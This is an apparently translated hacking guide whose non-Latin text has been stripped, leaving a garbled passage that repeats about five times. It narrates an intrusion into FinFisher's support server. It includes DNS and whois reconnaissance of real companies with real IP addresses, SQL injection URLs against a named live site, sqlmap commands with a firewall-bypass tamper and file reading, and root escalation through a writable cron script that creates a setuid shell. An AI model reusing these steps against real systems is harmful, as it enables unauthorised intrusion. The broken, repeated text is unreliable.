Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP IllustratedC:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127} , , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com , Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com , ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl , fierce.pl -dns - IP-. , , .
Google . , academi.com , - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com , .
FinFisher finsupport.finfisher.com whois- finfisher.com , " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools gamma-international.de , finsupport.finfisher.com .
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce git-, git.companyname.come/gitweb/ . ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce , , test.company.com dev.company.com , . nikto . webserver/.svn/ , webserver/backup/ , webserver/phpinfo.php . , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com :
nikto . . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php , , ). Scripts/scripts.js.php Google: allinurl:"Scripts/scripts.js.php" , , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php" , SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py' , , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/ 403 Forbidden , SQL- ( ). print.php ,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php , . ! MySQL . , magicquotes , MySQL- INTO OUTFILE . , sqlmap --file-read PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport Debian, , unix-privesc-check :
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron . webalizer , , . , cron , , cron . ls -l /etc/localtime , 6- , webalizer , , , . , , , - , , . Root- , .
, . , , . nmap . nse- nfs-* smb-* . finsupport - -, qateam , .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
